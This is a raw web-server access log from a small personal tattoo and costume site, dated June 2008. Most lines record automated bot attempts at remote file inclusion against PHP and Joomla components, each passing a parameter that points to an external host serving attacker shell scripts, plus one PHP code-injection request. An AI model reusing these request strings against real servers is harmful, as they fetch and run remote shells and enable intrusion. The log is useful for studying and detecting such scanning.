219.93.96.46 - - [24/Jun/2008:19:00:08 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 323 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:19:00:09 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 318 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:19:02:41 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:19:02:43 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
213.214.0.132 - - [24/Jun/2008:19:03:10 -0500] "GET /logs//components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 356 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:19:03:10 -0500] "GET //components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 351 "-""libwww-perl/5.803"
88.212.200.190 - - [24/Jun/2008:19:04:31 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
88.212.200.190 - - [24/Jun/2008:19:04:31 -0500] "GET /phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.79"
124.115.4.213 - - [24/Jun/2008:19:06:16 -0500] "GET / HTTP/1.1" 200 1243 "http://tomdolan.pconline.com/""Mozilla/4.0 (compatible; MSIE 6.0)"
88.212.200.190 - - [24/Jun/2008:19:08:10 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
88.212.200.190 - - [24/Jun/2008:19:08:10 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
217.148.95.147 - - [24/Jun/2008:19:08:12 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:19:08:12 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
202.53.78.212 - - [24/Jun/2008:19:08:49 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:19:08:49 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
72.29.75.39 - - [24/Jun/2008:19:09:48 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:19:09:49 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
62.205.161.238 - - [24/Jun/2008:19:12:20 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
62.205.161.238 - - [24/Jun/2008:19:12:26 -0500] "GET /phphtml.php?htmlclass_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 295 "-""libwww-perl/5.65"
202.53.78.212 - - [24/Jun/2008:19:14:57 -0500] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 313 "-""libwww-perl/5.79"
202.53.78.212 - - [24/Jun/2008:19:14:58 -0500] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 308 "-""libwww-perl/5.79"
87.118.118.156 - - [24/Jun/2008:19:16:16 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:19:16:18 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
193.91.48.90 - - [24/Jun/2008:19:17:53 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
193.91.48.90 - - [24/Jun/2008:19:17:54 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
219.93.96.46 - - [24/Jun/2008:19:19:45 -0500] "GET /logs//mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 317 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:19:19:46 -0500] "GET //mwchat/libs/start_lobby.php?CONFIG[MWCHAT_Libs]=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 312 "-""libwww-perl/5.79"
85.25.94.30 - - [24/Jun/2008:19:21:14 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:19:21:14 -0500] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootP=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 323 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:19:21:14 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:19:21:14 -0500] "GET //PhpLinkExchange/bits_listings.php?svr_rootP=http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 318 "-""libwww-perl/5.803"
219.93.96.46 - - [24/Jun/2008:19:32:30 -0500] "GET /logs//index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
219.93.96.46 - - [24/Jun/2008:19:32:30 -0500] "GET //index.php?option=com_mambots&Itemid=&mosConfig_absolute_path=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
200.203.122.236 - - [24/Jun/2008:19:37:37 -0500] "GET /logs//sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 358 "-""libwww-perl/5.805"
200.203.122.236 - - [24/Jun/2008:19:37:41 -0500] "GET //sohoadmin/program/modules/mods_full/shopping_cart/includes/login.php?_SESSION[docroot_path]=http://189.20.64.27/cache/id.txt??? HTTP/1.1" 404 353 "-""libwww-perl/5.805"
208.80.193.27 - - [24/Jun/2008:19:40:06 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; YPC 3.2.0; BT Openworld BB; .NET CLR 1.1.4322; yplus 5.3.04d)"
201.17.3.26 - - [24/Jun/2008:19:41:14 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
62.65.159.210 - - [24/Jun/2008:19:42:41 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 324 "-""libwww-perl/5.76"
62.65.159.210 - - [24/Jun/2008:19:42:41 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 319 "-""libwww-perl/5.76"
62.205.161.238 - - [24/Jun/2008:19:43:07 -0500] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 325 "-""libwww-perl/5.65"
62.205.161.238 - - [24/Jun/2008:19:43:13 -0500] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.tikkieterug.nl/administrator/backups/sistem.gif? HTTP/1.1" 404 320 "-""libwww-perl/5.65"
202.142.35.5 - - [24/Jun/2008:19:44:09 -0500] "GET /tattoo/tattoo1.htm HTTP/1.0" 200 3776 "http://www.google.com/search?client=safari&rls=en&q=vintage+flash+tattoo&ie=UTF-8&oe=UTF-8""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
202.142.35.5 - - [24/Jun/2008:19:44:09 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
202.142.35.5 - - [24/Jun/2008:19:44:09 -0500] "GET /tattoo/webring.jpg HTTP/1.0" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
202.142.35.5 - - [24/Jun/2008:19:44:09 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.0" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
213.214.0.132 - - [24/Jun/2008:19:54:09 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:19:54:09 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
65.55.208.120 - - [24/Jun/2008:19:54:18 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.120 - - [24/Jun/2008:19:54:18 -0500] "GET /logs/access_log.1188432000 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
85.25.94.30 - - [24/Jun/2008:20:00:21 -0500] "GET /logs/facileforms.frame.php?ff_compath=http://room-escape-games.com/r57.txt?http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:20:00:21 -0500] "GET /facileforms.frame.php?ff_compath=http://room-escape-games.com/r57.txt?http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:20:00:22 -0500] "GET /logs/facileforms.frame.php?ff_compath=http://room-escape-games.com/r57.txt?http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 310 "-""libwww-perl/5.803"
85.25.94.30 - - [24/Jun/2008:20:00:22 -0500] "GET /facileforms.frame.php?ff_compath=http://room-escape-games.com/r57.txt?http://crashoveride.altervista.org/ooid.txt?? HTTP/1.1" 404 305 "-""libwww-perl/5.803"
72.29.75.39 - - [24/Jun/2008:20:02:06 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:02:06 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:04:13 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:04:13 -0500] "GET /logs/index2.php?x=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:04:13 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:04:13 -0500] "GET /index2.php?x=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
74.6.18.220 - - [24/Jun/2008:20:05:16 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.90 - - [24/Jun/2008:20:05:17 -0500] "GET /costume/ HTTP/1.0" 200 640 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
201.137.165.12 - - [24/Jun/2008:20:06:51 -0500] "GET /tattoo/set3.htm HTTP/1.1" 200 2177 "http://images.google.com.mx/imgres?imgurl=http://tomdolan.pconline.com/tattoo/tat6.JPG&imgrefurl=http://tomdolan.pconline.com/tattoo/tattoo-order.htm&h=246&w=236&sz=19&hl=es&start=108&um=1&tbnid=Js0hVP5NTJi0TM:&tbnh=110&tbnw=106&prev=""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:51 -0500] "GET /tattoo/tatc1.JPG HTTP/1.1" 200 21412 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:52 -0500] "GET /tattoo/tatc10.JPG HTTP/1.1" 200 14157 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:52 -0500] "GET /tattoo/tatc2.JPG HTTP/1.1" 200 17893 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:52 -0500] "GET /tattoo/tatc3.JPG HTTP/1.1" 200 16313 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:52 -0500] "GET /tattoo/tatc4.JPG HTTP/1.1" 200 12619 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:53 -0500] "GET /tattoo/tatc8.JPG HTTP/1.1" 200 17057 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:53 -0500] "GET /tattoo/tatc6.JPG HTTP/1.1" 200 14549 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:53 -0500] "GET /tattoo/tatc7.JPG HTTP/1.1" 200 12347 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:53 -0500] "GET /tattoo/tatc9.JPG HTTP/1.1" 200 18139 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
201.137.165.12 - - [24/Jun/2008:20:06:54 -0500] "GET /tattoo/tatc5.JPG HTTP/1.1" 200 19436 "http://tomdolan.pconline.com/tattoo/set3.htm""Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; MSN Optimized;MX; MSN Optimized;MX)"
87.118.118.156 - - [24/Jun/2008:20:06:57 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:20:06:58 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.148.95.147 - - [24/Jun/2008:20:09:26 -0500] "GET /logs/book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 298 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:20:09:26 -0500] "GET /book.php5?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 293 "-""libwww-perl/5.76"
72.55.168.243 - - [24/Jun/2008:20:09:32 -0500] "GET /logs//header.php?prefix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.805"
72.55.168.243 - - [24/Jun/2008:20:09:32 -0500] "GET //header.php?prefix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
66.7.200.210 - - [24/Jun/2008:20:09:50 -0500] "GET /logs//header.php?prefix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.810"
66.7.200.210 - - [24/Jun/2008:20:09:50 -0500] "GET //header.php?prefix=http://www.iglesialcs.cl/newweb/cache/id2.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.810"
74.6.17.164 - - [24/Jun/2008:20:15:40 -0500] "GET /robots.txt HTTP/1.0" 404 282 "-""Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.98.217 - - [24/Jun/2008:20:15:41 -0500] "GET / HTTP/1.0" 200 1231 "-""Mozilla/5.0 (compatible; Yahoo! DE Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
72.29.75.39 - - [24/Jun/2008:20:19:45 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 88841 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:19:45 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
213.214.0.132 - - [24/Jun/2008:20:23:22 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:20:23:23 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:20:23:23 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
213.214.0.132 - - [24/Jun/2008:20:23:23 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://xxxxxx.xxxxx.xxx.gif? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
217.148.95.147 - - [24/Jun/2008:20:25:34 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 88841 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:20:25:34 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 1243 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:20:27:16 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:20:27:17 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.76"
87.118.118.156 - - [24/Jun/2008:20:27:20 -0500] "GET /logs//?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 88841 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:20:27:21 -0500] "GET //?page=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:20:27:43 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:20:27:44 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.805"
72.29.75.39 - - [24/Jun/2008:20:29:38 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 338 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:29:38 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 333 "-""libwww-perl/5.810"
202.142.35.5 - - [24/Jun/2008:20:32:24 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
200.219.226.74 - - [24/Jun/2008:20:32:28 -0500] "GET /logs//ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://logistics.vec.go.th/r57.txt? HTTP/1.1" 404 325 "-""libwww-perl/5.79"
200.219.226.74 - - [24/Jun/2008:20:32:29 -0500] "GET //ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://logistics.vec.go.th/r57.txt? HTTP/1.1" 404 320 "-""libwww-perl/5.79"
217.148.95.147 - - [24/Jun/2008:20:33:18 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.76"
217.148.95.147 - - [24/Jun/2008:20:33:18 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.76"
209.172.57.250 - - [24/Jun/2008:20:35:40 -0500] "GET /logs//admin.php?include_path=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 299 "-""libwww-perl/5.805"
209.172.57.250 - - [24/Jun/2008:20:35:41 -0500] "GET //admin.php?include_path=http://www.theresapridemore.com/fav.ico?? HTTP/1.1" 404 294 "-""libwww-perl/5.805"
202.142.35.5 - - [24/Jun/2008:20:37:34 -0500] "GET /favicon.ico HTTP/1.0" 404 283 "-""Mozilla/5.0 (Macintosh; U; Intel Mac OS X; en) AppleWebKit/419.2.1 (KHTML, like Gecko) Safari/419.3"
87.118.118.156 - - [24/Jun/2008:20:37:56 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 352 "-""libwww-perl/5.805"
87.118.118.156 - - [24/Jun/2008:20:37:56 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/oldbisok?? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
72.29.75.39 - - [24/Jun/2008:20:39:41 -0500] "GET /logs/index1.php?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:39:42 -0500] "GET /logs/index1.php?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 299 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:39:42 -0500] "GET /index1.php?page=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:39:42 -0500] "GET /index1.php?page=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 294 "-""libwww-perl/5.810"
201.17.3.26 - - [24/Jun/2008:20:40:42 -0500] "GET /logs//?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 200 77669 "-""libwww-perl/5.79"
201.17.3.26 - - [24/Jun/2008:20:40:45 -0500] "GET //?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 200 1243 "-""libwww-perl/5.79"
81.169.139.117 - - [24/Jun/2008:20:41:12 -0500] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 338 "-""libwww-perl/5.803"
81.169.139.117 - - [24/Jun/2008:20:41:12 -0500] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.friendsofnarconon.org/modules/is/Osryid.txt?? HTTP/1.1" 404 333 "-""libwww-perl/5.803"
72.29.75.39 - - [24/Jun/2008:20:42:36 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:42:36 -0500] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 352 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:42:36 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/old? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
72.29.75.39 - - [24/Jun/2008:20:42:37 -0500] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=ftp://24.227.40.218/temp/trem/1? HTTP/1.1" 404 347 "-""libwww-perl/5.810"
200.35.33.82 - - [24/Jun/2008:20:43:35 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
200.35.33.82 - - [24/Jun/2008:20:43:46 -0500] "GET /index.php?mosConfig_absolute_path=http://tutoriaisclube.com/imagens/safeon??????? HTTP/1.1" 404 293 "-""libwww-perl/5.805"
217.167.194.105 - - [24/Jun/2008:20:52:17 -0500] "GET /logs//poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
217.167.194.105 - - [24/Jun/2008:20:52:18 -0500] "GET //poll/comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.wauze.de//language/lang_english/RuLeZ/me.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.803"
211.20.85.150 - - [24/Jun/2008:20:54:26 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; MSIECrawler)"
